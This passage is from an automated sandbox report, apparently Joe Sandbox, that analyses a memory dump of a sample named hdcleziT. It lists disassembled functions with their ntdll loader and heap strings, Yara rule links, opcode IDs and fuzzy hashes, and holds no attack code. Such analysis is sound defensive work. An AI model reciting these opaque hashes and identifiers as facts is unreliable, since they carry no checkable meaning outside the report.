                                                                                                    • Opcode Fuzzy Hash: f8fcf2e8ed97cb50ef44fd77fbf35b1008a1276fb52468a41f5d8cc6afe075d5
                                                                                                    • Instruction Fuzzy Hash: D991A171618744AFE322CF69CC50EABBAEAFF84244F40092EFA8897155D734D9048B62
                                                                                                    Function 24CC0C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 24D155AE
                                                                                                    • HEAP[%wZ]: , xrefs: 24D154D1, 24D15592
                                                                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 24D154ED
                                                                                                    • HEAP: , xrefs: 24D154E0, 24D155A1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                    • API String ID: 0-1657114761
                                                                                                    • Opcode ID: d480961c8fdb891ad7c470654dbdce5947e5e6be769ad5e2707b0f81deb12421
                                                                                                    • Instruction ID: e363cd48d515a056d36ebd42a61695557ec3a9144c775d5a552c7376b94f86f8
                                                                                                    • Opcode Fuzzy Hash: d480961c8fdb891ad7c470654dbdce5947e5e6be769ad5e2707b0f81deb12421
                                                                                                    • Instruction Fuzzy Hash: 48A10F706002169FD715CFAEC490BAABBF3BF04320F14856DE9998B286D734E944CB91
                                                                                                    Function 24CE273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 24D222B6
                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 24D221DE
                                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 24D221D9, 24D222B1
                                                                                                    • .Local, xrefs: 24CE28D8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                    • API String ID: 0-1239276146
                                                                                                    • Opcode ID: e181d72678d30c68b1d0b56c3333e16ee3f49fb671f0aaa6baf117e244a51516
                                                                                                    • Instruction ID: ba86c93c886456042a96ffa92e91623131d58b67e77efb27bad462f21ceeeb15
                                                                                                    • Opcode Fuzzy Hash: e181d72678d30c68b1d0b56c3333e16ee3f49fb671f0aaa6baf117e244a51516
                                                                                                    • Instruction Fuzzy Hash: 6FA1D231A01229DFDB25CF69DC84BA9B7B2BF58314F1505EDE908AB259D7309E80CF90
                                                                                                    Function 24CB64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 24D11028
                                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 24D10FE5
                                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 24D1106B
                                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 24D110AE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                    • API String ID: 0-1468400865
                                                                                                    • Opcode ID: 5c2b4acf765a2decead7cf8cc0ad67d1882f84236c2536887d046929d934b435
                                                                                                    • Instruction ID: 207d3c635e624eb0c091101b4c0fa5d4c174de3e578cc0f116dc07b3c4b3699e
                                                                                                    • Opcode Fuzzy Hash: 5c2b4acf765a2decead7cf8cc0ad67d1882f84236c2536887d046929d934b435
                                                                                                    • Instruction Fuzzy Hash: 0871A071A043049FD711DF19C884F8B7BAAAF64B50F444469F9888B18AD734D698CFD2
                                                                                                    Function 24CE4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 24D23640, 24D2366C
                                                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 24D2365C
                                                                                                    • LdrpFindDllActivationContext, xrefs: 24D23636, 24D23662
                                                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 24D2362F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                    • API String ID: 0-3779518884
                                                                                                    • Opcode ID: 67c635d9b7270c542cc5161fec54eeb1b304906d928f3720a3f0c232a4d9053c
                                                                                                    • Instruction ID: 166716cc844772296f73ce2a3f91e11c38f05ae3e8421364d1b6ad07492be418
                                                                                                    • Opcode Fuzzy Hash: 67c635d9b7270c542cc5161fec54eeb1b304906d928f3720a3f0c232a4d9053c
                                                                                                    • Instruction Fuzzy Hash: 09313832F00611FFDB12DB1DC898B7566A7FB49254F06406AE60CA7292D7B4DF80869D
                                                                                                    Function 24CD245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 24D1A992
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 24D1A9A2
                                                                                                    • apphelp.dll, xrefs: 24CD2462
                                                                                                    • LdrpDynamicShimModule, xrefs: 24D1A998
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-176724104
                                                                                                    • Opcode ID: f3c355dee0f292f8d2bf04df417cd13d9ddb62a1b4e1bd149d12711e15173863
                                                                                                    • Instruction ID: e03540d6f9fc1958b3d226321ff0a2854a17cf15924fab082df30dec7f1eff65
                                                                                                    • Opcode Fuzzy Hash: f3c355dee0f292f8d2bf04df417cd13d9ddb62a1b4e1bd149d12711e15173863
                                                                                                    • Instruction Fuzzy Hash: 93312672A00211EBD7119FADD890E5ABBB7FB80B00F16405EFD44BB389C7B45981CBA0
                                                                                                    Function 24CC0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                    • API String ID: 0-4253913091
                                                                                                    • Opcode ID: dc417bfde1e5b422dcc71d9966f58f68a9e167b74654a01356ab994448978676
                                                                                                    • Instruction ID: fcadd5d78a9c905a0002ff906cf418a29442088c2a4ef2386414e575327db6ee
                                                                                                    • Opcode Fuzzy Hash: dc417bfde1e5b422dcc71d9966f58f68a9e167b74654a01356ab994448978676
                                                                                                    • Instruction Fuzzy Hash: 13F19B30B00605DFEB15CFAAD890F6AB7F6FB44314F1481A8E9199B395D734AA81CF90
                                                                                                    Function 24CAA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                                    • API String ID: 0-2779062949
                                                                                                    • Opcode ID: 11c4cc03e65594e648d29ddc21b5bf48f359ed9bb34d75ee1f98615172decf33
                                                                                                    • Instruction ID: eb67744acb54bfa7bcab9511708530e4d009198d2113b0ee33a60db5d81bf558
                                                                                                    • Opcode Fuzzy Hash: 11c4cc03e65594e648d29ddc21b5bf48f359ed9bb34d75ee1f98615172decf33
                                                                                                    • Instruction Fuzzy Hash: 1BA180319116299BDB31DF68CC88BE9B7B9FF44704F1045EAE909A7250D7359E88CF50
                                                                                                    Function 24CACCC8 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • @, xrefs: 24CACD63
                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 24CACD34
                                                                                                    • InstallLanguageFallback, xrefs: 24CACD7F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                    • API String ID: 0-1757540487
                                                                                                    • Opcode ID: d80f46519c72fb923e35bea75d24653ea3ae019034bb5350b458d87994f6f8c5
                                                                                                    • Instruction ID: 5205279f9c308ca460f46ff342aed223cc90415e0ec36d9d18bfc9fb475dc274
                                                                                                    • Opcode Fuzzy Hash: d80f46519c72fb923e35bea75d24653ea3ae019034bb5350b458d87994f6f8c5
                                                                                                    • Instruction Fuzzy Hash: 0251047A9043569BC701CF68C844BABB7E9BF98714F01496EFA88D7340E734DA04C7A2
                                                                                                    Function 24CEC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • Failed to reallocate the system dirs string !, xrefs: 24D282D7
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 24D282E8
                                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 24D282DE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-1783798831
                                                                                                    • Opcode ID: 29cd82119cc9e610301ce4988ae487fffb779868820d1357ad5a3a8d6c1ff751
                                                                                                    • Instruction ID: 72b0b7f8e25fd9e9b5e08d7d57d568807509bae2abf8db63e4ec15f6addb9fc3
                                                                                                    • Opcode Fuzzy Hash: 29cd82119cc9e610301ce4988ae487fffb779868820d1357ad5a3a8d6c1ff751
                                                                                                    • Instruction Fuzzy Hash: BD410576A00320EBD711DB6CC850B5B7BEAEF59754F05492AF988E7295E734D800CB91
                                                                                                    Function 24D6C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • PreferredUILanguages, xrefs: 24D6C212
                                                                                                    • @, xrefs: 24D6C1F1
                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 24D6C1C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                    • API String ID: 0-2968386058
                                                                                                    • Opcode ID: b71ef65150382686c45b30b1471706c42b189f0e4e1a4ddaff5cd084c73090a8
                                                                                                    • Instruction ID: 41ecce8f26bb884f53ae89cd3fda97791264d5975072a5f81ea56e31c82527be
                                                                                                    • Opcode Fuzzy Hash: b71ef65150382686c45b30b1471706c42b189f0e4e1a4ddaff5cd084c73090a8
                                                                                                    • Instruction Fuzzy Hash: BF416371E00219EFDB11CFD8D890FDEBBB9BB18B04F10456AEA06B7258D7749A44CB50
                                                                                                    Function 24D34755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 24D34899
                                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 24D34888
                                                                                                    • LdrpCheckRedirection, xrefs: 24D3488F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                    • API String ID: 0-3154609507
                                                                                                    • Opcode ID: 623c3aad6b9e384091f2613083cd721c7ff26858aa01382d319a1e9bec032f9c
                                                                                                    • Instruction ID: f3b854591409695853e7dbd715ac74d8b74641bda82fd222a6691a294a5548be
                                                                                                    • Opcode Fuzzy Hash: 623c3aad6b9e384091f2613083cd721c7ff26858aa01382d319a1e9bec032f9c
                                                                                                    • Instruction Fuzzy Hash: 8D41AC72A156609FCB12CE69C940A167FE9FB89B50B0105ADED98AB311E728FC00CF91
                                                                                                    Function 24D44144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                    • API String ID: 0-1373925480
                                                                                                    • Opcode ID: b5ca4860bd0c8c7bcd0ea653e90252eaee4fe0bc62d3612b862c5ee56d49889b
                                                                                                    • Instruction ID: 2b7a36da369d35ae459a4777dc64b4b9d9031ca9bcd650bd4afdd8efcdf737d2
                                                                                                    • Opcode Fuzzy Hash: b5ca4860bd0c8c7bcd0ea653e90252eaee4fe0bc62d3612b862c5ee56d49889b
                                                                                                    • Instruction Fuzzy Hash: 20411371E01698CBEB12CB98C880B9DBBF9FF55340F10045ED941EB795DB75A981CB11
                                                                                                    Function 24D320DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 24D32104
                                                                                                    • LdrpInitializationFailure, xrefs: 24D320FA
                                                                                                    • Process initialization failed with status 0x%08lx, xrefs: 24D320F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-2986994758
                                                                                                    • Opcode ID: ad42e55d5b4cd3adf0998e0176890259ebf9eef99799d5ab31d40de02bc239fd
                                                                                                    • Instruction ID: 602ddecca22f92b34e3b5c999fd6624d9f2e966f2dbc3eed87792db32eb2badc
                                                                                                    • Opcode Fuzzy Hash: ad42e55d5b4cd3adf0998e0176890259ebf9eef99799d5ab31d40de02bc239fd
                                                                                                    • Instruction Fuzzy Hash: 72F0C231A00258BBE710D64CCDA2FAA7BEAFB40B58F100059F6447B289D6B4A900CE95
                                                                                                    Function 24CC03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: #%u
                                                                                                    • API String ID: 48624451-232158463
                                                                                                    • Opcode ID: f3ed4a7be82c5c96a039ed04299f84efff4e4d09bd608bf461513b660b76ea08
                                                                                                    • Instruction ID: c52a3337645ba1a274dc013915f770c6e3d8f0d83acf629d18d64e48f8c7d464
                                                                                                    • Opcode Fuzzy Hash: f3ed4a7be82c5c96a039ed04299f84efff4e4d09bd608bf461513b660b76ea08
                                                                                                    • Instruction Fuzzy Hash: 9B714B71A001499FDB01CFA9D990FAEBBF9FF08744F154069E904E7255EA34EE01CB64
                                                                                                    Function 24CB2FC8 Relevance: 2.9, Strings: 2, Instructions: 410COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @4Cw@4Cw$PATH
                                                                                                    • API String ID: 0-1794901795
                                                                                                    • Opcode ID: 49260cb1285682be7b9e540e4295aac28f4d68b70bd8e41139f06184ee27fc23
                                                                                                    • Instruction ID: e9067ecd69dae008405c4e68c945e66c18d5f91610ba18683592d560a80a7382
                                                                                                    • Opcode Fuzzy Hash: 49260cb1285682be7b9e540e4295aac28f4d68b70bd8e41139f06184ee27fc23
                                                                                                    • Instruction Fuzzy Hash: FCF19275E00229DBDB15CF9DD880AAEBBB6FF48700F594069F580BB360D7B4A941CB61
                                                                                                    Function 24D7A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: `$`
                                                                                                    • API String ID: 0-197956300
                                                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                    • Instruction ID: f632d5a2d7355551ce6eaf72fa5493a9c91598c4ed9576ca7e1485a948046883
                                                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                    • Instruction Fuzzy Hash: 0DC1DD312083429BEB15CF28CC81B2BBBF6BFC4718F044A2DF6958A290D775D505CB92
                                                                                                    Function 24D2E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: Legacy$UEFI
                                                                                                    • API String ID: 2994545307-634100481
                                                                                                    • Opcode ID: fec307ed9d77f80538723e7c01d5856996315d4ba584e732d05be75839e3d9ef
                                                                                                    • Instruction ID: abcf5aa9abd5a6ec1338dcfb8143af26d1f5c3ee25981311b4ba038e5b23a815
                                                                                                    • Opcode Fuzzy Hash: fec307ed9d77f80538723e7c01d5856996315d4ba584e732d05be75839e3d9ef
                                                                                                    • Instruction Fuzzy Hash: F0616F71E046199FDB15CFB9C880BAEBBF9FB54704F10406EE699EB252D7319900CB50
                                                                                                    Function 24CBAC50 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • LdrpResGetMappingSize Enter, xrefs: 24CBAC6A
                                                                                                    • LdrpResGetMappingSize Exit, xrefs: 24CBAC7C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                                    • API String ID: 0-1497657909
                                                                                                    • Opcode ID: ecadb8d9aef9f4344b6950a69c615d8e4abbc5af8e47d0bfb0081e7956ef8677
                                                                                                    • Instruction ID: 855457a2f521893af770913cd3219cab9fc2be01f281874da5865c31e87020f0
                                                                                                    • Opcode Fuzzy Hash: ecadb8d9aef9f4344b6950a69c615d8e4abbc5af8e47d0bfb0081e7956ef8677
                                                                                                    • Instruction Fuzzy Hash: C061DF71A046489FEB12CFADD880B8EBBB6BF54751F04056AE984EB290D7B6D940C720
                                                                                                    Function 24D543D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$MUI
                                                                                                    • API String ID: 0-17815947
                                                                                                    • Opcode ID: d9594bea63bc9fc6b84cd5885d20e25bfde9ea12bbbf41bd326a1cd69bc3b686
                                                                                                    • Instruction ID: 52959b1369f5b4acd936cc9914b93af7e17ffa425b481a11408609e309fce01d
                                                                                                    • Opcode Fuzzy Hash: d9594bea63bc9fc6b84cd5885d20e25bfde9ea12bbbf41bd326a1cd69bc3b686
                                                                                                    • Instruction Fuzzy Hash: E0514971D0021DAEEF01CFA9CC84BEEBBB9FB04754F10012AE611B7294DA34A905CBA0
                                                                                                    Function 24CE4C59 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 0$Flst
                                                                                                    • API String ID: 0-758220159
                                                                                                    • Opcode ID: 8eb7208b28513c708d78a36f278e099125e5e8ecb8a52da2d8e784ddbeae1d72
                                                                                                    • Instruction ID: 7330d5bdd1b255c77e1be7e0fe770764cd1040049d65d619ba56a9f667ab72ac
                                                                                                    • Opcode Fuzzy Hash: 8eb7208b28513c708d78a36f278e099125e5e8ecb8a52da2d8e784ddbeae1d72
                                                                                                    • Instruction Fuzzy Hash: 4C518AB1F00614DBCB16CFA9C484669FBF6EF48718F14806ED0499B292E7B4DA85CB84
                                                                                                    Function 24CB04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • kLsE, xrefs: 24CB0540
                                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 24CB063D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                    • API String ID: 0-2547482624
                                                                                                    • Opcode ID: db73c286f0b51d7c16550d8adbc5194c0faa4fd7ee3c6662735a7085b7048165
                                                                                                    • Instruction ID: 9605ad2583daa5c5781f97341337804fcd13c889e6ea35a8929f4353580d0c89
                                                                                                    • Opcode Fuzzy Hash: db73c286f0b51d7c16550d8adbc5194c0faa4fd7ee3c6662735a7085b7048165
                                                                                                    • Instruction Fuzzy Hash: 8851DF715147428FC324DF6AC440697BBE6BF85324F00883EEAEA97641E734DA49CF96
                                                                                                    Function 24CE2E9C Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 24D2280C
                                                                                                    • RtlpInsertAssemblyStorageMapEntry, xrefs: 24D22807
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                                    • API String ID: 0-2104531740
                                                                                                    • Opcode ID: 4a93f2808f0113a675a0195d66923979eb828e204f500b87cb19bbadb3e3e9c4
                                                                                                    • Instruction ID: c7d0f7a461e3aa861c90e2924965495cdf913db44d5da7bb2d562fed65fd0f76
                                                                                                    • Opcode Fuzzy Hash: 4a93f2808f0113a675a0195d66923979eb828e204f500b87cb19bbadb3e3e9c4
                                                                                                    • Instruction Fuzzy Hash: 0841BE36604A15EBD714CF59C880F6AB7A6FF94B14F20806DF9889F695D7309D41CBA0
                                                                                                    Function 24CBA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 24CBA2FB
